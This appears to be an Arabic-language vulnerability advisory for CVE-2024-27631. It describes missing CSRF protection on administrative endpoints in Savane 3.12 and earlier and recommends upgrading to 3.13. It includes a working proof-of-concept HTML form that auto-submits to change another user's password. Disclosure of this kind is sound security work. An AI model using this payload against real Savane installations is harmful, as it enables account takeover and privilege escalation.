
CVE-2024–27631 مرجع
في Savane الإصدار 3.12 والإصدارات السابقة، يؤدي الافتقار إلى حماية CSRF على الوظائف الإدارية إلى إمكانية تصعيد الامتيازات و/أو الاستيلاء على الحسابات. على وجه الخصوص، تتضمن نقطة النهاية /siteadmin/usergroup.php وظيفة تغيير كلمات المرور والأعلام الإدارية للمستخدمين الآخرين، مما يسمح للمهاجم بجعل نفسه مسؤولاً بفعالية.
تشمل نقاط النهاية البارزة الأخرى المعرضة لـ CSRF ما يلي:
/support/admin/userperms.php - تغيير صلاحيات من يمكنه النشر في أداة التتبع./project/admin/conf-copy.php - استبدال التكوين الحالي لمجموعة بنسخة من مجموعة أخرى./project/admin/editgroupnotifications.php - تعديل إشعارات المجموعة. يمكن إرسال العناصر الخاصة إلى القوائم البريدية العامة./project/admin/useradmin.php - حذف المستخدمين من مجموعة./news/admin/index.php - تعديل عنوان البريد الإلكتروني لأداة تتبع الأخبار./people/editjob.php - إضافة وظيفة لمجموعة.تصنيف CWE: CWE-352: تزوير الطلب عبر المواقع (CSRF)
تم الإبلاغ بواسطة: Ally Petitt
المنتج المتأثر: Savane
الإصدارات المتأثرة: 3.12 والإصدارات السابقة
هذا إثبات مفهوم (PoC) لتغيير كلمة مرور حساب مستخدم آخر كطريق للاستيلاء على الحساب.
/users/<username>).user_id بمعرف المستخدم الضحية و<savane_instance> باسم النطاق/عنوان المضيف الصحيح.<form id="autosubmit" action="http://<savane_instance>/siteadmin/user_changepw.php" method="POST">
<input name="form_pw" type="hidden" value="Password1!" />
<input name="form_pw2" type="hidden" value="Password1!" />
<input name="user_id" type="hidden" value="<user_id>" />
<input name="update" type="hidden" value="Update" />
<input type="submit" value="Submit Request" />
</form>
<script>
document.getElementById("autosubmit").submit();
</script>
Password1!.لاحظ أن سكريبت إثبات المفهوم هذا تم اختباره على Firefox v103.0 (64-bit).
قم بالترقية إلى إصدار Savane 3.13 أو أعلى. يمكن العثور على التصحيح هنا.